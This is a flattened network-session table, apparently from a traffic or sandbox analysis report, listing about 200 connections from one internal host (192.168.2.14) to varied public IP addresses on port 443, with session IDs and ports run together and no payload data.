                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19676192.168.2.145714092.89.78.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19677192.168.2.1434764221.178.150.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19678192.168.2.1446200161.118.7.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19679192.168.2.143749417.137.5.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19680192.168.2.143670231.20.128.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19681192.168.2.144559034.14.194.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19682192.168.2.144322887.65.212.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19683192.168.2.144524643.234.225.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19684192.168.2.1455334190.178.139.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19685192.168.2.1440488200.183.106.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19686192.168.2.144271646.245.162.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19687192.168.2.143639062.125.2.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19688192.168.2.144852072.13.189.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19689192.168.2.145883683.141.19.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19690192.168.2.1438102207.246.27.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19691192.168.2.1439500153.166.233.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19692192.168.2.143823435.100.101.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19693192.168.2.144292437.74.14.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19694192.168.2.1443386181.156.127.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19695192.168.2.143371238.25.123.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19696192.168.2.1453770121.84.77.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19697192.168.2.143594827.194.51.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19698192.168.2.145458285.192.73.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19699192.168.2.1459084149.122.180.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19700192.168.2.146018461.233.50.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19701192.168.2.144613067.106.17.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19702192.168.2.1452984179.113.197.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19703192.168.2.1453364141.133.121.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19704192.168.2.1447576194.2.67.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19705192.168.2.1433360122.217.13.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19706192.168.2.143709485.114.131.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19707192.168.2.1456116209.231.194.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19708192.168.2.145998251.134.182.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19709192.168.2.1453348165.16.189.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19710192.168.2.1434742221.226.19.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19711192.168.2.1456074158.31.220.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19712192.168.2.1434368222.238.171.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19713192.168.2.145390292.206.112.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19714192.168.2.145476457.220.50.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19715192.168.2.145620425.46.190.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19716192.168.2.144996440.231.212.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19717192.168.2.145088820.255.23.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19718192.168.2.1452276133.243.169.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19719192.168.2.143402669.63.208.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19720192.168.2.145342835.148.23.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19721192.168.2.1455506144.227.96.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19722192.168.2.1448780159.7.6.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19723192.168.2.1446866166.186.90.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19724192.168.2.144155894.89.93.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19725192.168.2.1447542147.166.192.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19726192.168.2.145842885.174.102.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19727192.168.2.1441724156.158.192.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19728192.168.2.1459986100.5.31.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19729192.168.2.143596491.253.122.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19730192.168.2.1440620152.66.17.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19731192.168.2.1452572172.172.91.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19732192.168.2.143345213.248.55.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19733192.168.2.1452216209.85.94.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19734192.168.2.1443874114.232.232.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19735192.168.2.1459370202.210.134.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19736192.168.2.1452446206.96.129.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19737192.168.2.1434774198.58.185.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19738192.168.2.144776647.204.222.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19739192.168.2.1433916122.208.10.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19740192.168.2.1433914149.37.60.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19741192.168.2.1456000119.126.184.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19742192.168.2.1460772198.30.119.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19743192.168.2.1456212201.187.36.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19744192.168.2.1452730115.169.26.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19745192.168.2.1453260123.172.88.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19746192.168.2.1433196182.139.114.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19747192.168.2.1445186202.80.207.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19748192.168.2.1440750123.122.180.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19749192.168.2.144464447.246.180.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19750192.168.2.1440676177.100.42.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19751192.168.2.143764675.23.204.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19752192.168.2.1457340223.43.210.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19753192.168.2.143522475.249.9.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19754192.168.2.1433490154.210.36.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19755192.168.2.1454978195.249.41.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19756192.168.2.1452692107.121.128.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19757192.168.2.1458688135.47.54.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19758192.168.2.1452496123.214.99.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19759192.168.2.145594665.82.57.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19760192.168.2.1452514176.71.250.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19761192.168.2.144698857.255.170.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19762192.168.2.1460288152.53.10.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19763192.168.2.1444240133.223.132.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19764192.168.2.143342061.179.122.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19765192.168.2.145943662.174.223.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19766192.168.2.143832274.81.238.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19767192.168.2.1449794153.38.152.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19768192.168.2.145669095.145.129.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19769192.168.2.144008014.159.21.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19770192.168.2.1457986206.213.111.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19771192.168.2.143914638.7.92.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19772192.168.2.1444716200.75.193.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19773192.168.2.145627693.189.178.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19774192.168.2.1456454115.153.88.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19775192.168.2.1449166203.19.158.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19776192.168.2.1436358139.189.2.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19777192.168.2.145275224.128.221.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19778192.168.2.1447750152.253.254.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19779192.168.2.1456644106.110.139.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19780192.168.2.144346478.214.228.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19781192.168.2.144033417.2.186.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19782192.168.2.1440010185.234.235.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19783192.168.2.1454142180.38.61.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19784192.168.2.1446912139.74.136.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19785192.168.2.1451502212.4.34.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19786192.168.2.143904060.49.213.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19787192.168.2.144878245.62.76.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19788192.168.2.145092474.161.167.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19789192.168.2.1446712211.84.34.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19790192.168.2.1456442158.239.107.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19791192.168.2.1441708116.158.138.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19792192.168.2.145662287.71.11.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19793192.168.2.1448574141.245.110.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19794192.168.2.143511219.219.225.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19795192.168.2.1456578134.125.72.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19796192.168.2.145356486.138.96.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19797192.168.2.145256844.99.80.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19798192.168.2.1443158190.188.81.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19799192.168.2.145407092.132.129.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19800192.168.2.1456842143.200.4.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19801192.168.2.145433842.77.125.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19802192.168.2.1460300114.86.113.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19803192.168.2.1444450150.41.78.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19804192.168.2.1446790100.207.211.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19805192.168.2.1445930197.44.83.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19806192.168.2.145773891.107.166.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19807192.168.2.1437186211.133.22.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19808192.168.2.1457494145.112.149.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19809192.168.2.144405666.201.130.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19810192.168.2.1444850136.120.129.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19811192.168.2.1440660119.178.49.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19812192.168.2.1438162194.78.119.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19813192.168.2.143623874.182.166.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19814192.168.2.1459450105.116.144.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19815192.168.2.145300635.52.49.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19816192.168.2.144044675.242.241.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19817192.168.2.1451240184.245.111.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19818192.168.2.145279251.213.124.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19819192.168.2.1452548142.104.156.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19820192.168.2.144726663.26.180.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19821192.168.2.145142069.90.40.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19822192.168.2.1447812187.19.70.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19823192.168.2.1452566120.105.81.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19824192.168.2.1439930203.32.234.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19825192.168.2.144912257.20.196.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19826192.168.2.143624224.44.77.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19827192.168.2.1445378131.83.2.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19828192.168.2.1441802171.153.90.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19829192.168.2.1452522211.9.38.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19830192.168.2.1460602172.223.217.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19831192.168.2.1443898114.221.77.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19832192.168.2.1453846156.133.249.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19833192.168.2.144449641.121.242.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19834192.168.2.14462904.97.75.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19835192.168.2.143652434.235.130.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19836192.168.2.144208237.194.4.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19837192.168.2.1454592108.214.201.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19838192.168.2.146071295.255.161.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19839192.168.2.146012246.131.109.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19840192.168.2.1435520188.17.49.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19841192.168.2.1456810185.41.207.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19842192.168.2.1433816169.117.133.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19843192.168.2.1439224179.25.253.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19844192.168.2.1454326219.234.242.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19845192.168.2.1458220119.230.48.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19846192.168.2.1446772184.119.113.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19847192.168.2.1441104211.36.67.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19848192.168.2.1434938112.122.206.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19849192.168.2.1447604148.240.158.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19850192.168.2.1440530200.148.37.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19851192.168.2.1439850169.148.109.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19852192.168.2.1454086124.125.80.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19853192.168.2.145809617.125.252.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19854192.168.2.1437912168.124.251.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19855192.168.2.1452516179.121.42.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19856192.168.2.144988466.191.239.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19857192.168.2.1458478179.234.243.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19858192.168.2.145515067.180.94.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19859192.168.2.1434878221.130.44.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19860192.168.2.143278624.57.147.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19861192.168.2.1436828156.60.83.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19862192.168.2.145220090.61.255.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19863192.168.2.14373825.82.236.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19864192.168.2.1452292185.80.200.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19865192.168.2.1459886116.46.86.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19866192.168.2.1446406198.176.4.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19867192.168.2.1458184106.23.21.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19868192.168.2.1448566119.103.36.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19869192.168.2.1449086103.56.82.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19870192.168.2.145362824.0.72.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19871192.168.2.1453796124.175.131.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19872192.168.2.1457512117.21.229.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19873192.168.2.1437142207.234.157.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19874192.168.2.1460320162.128.95.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19875192.168.2.143626435.160.28.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19876192.168.2.143887244.230.142.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19877192.168.2.14598121.157.72.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19878192.168.2.143292858.40.123.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19879192.168.2.1434912192.50.35.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19880192.168.2.1435614213.244.49.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19881192.168.2.1453566130.60.112.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19882192.168.2.1445132180.108.53.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19883192.168.2.145592239.164.60.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19884192.168.2.1433764145.208.49.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19885192.168.2.1459754205.17.2.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19886192.168.2.1459766202.171.105.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19887192.168.2.1442840146.54.123.129443
                                                        TimestampBytes transferredDirectionData


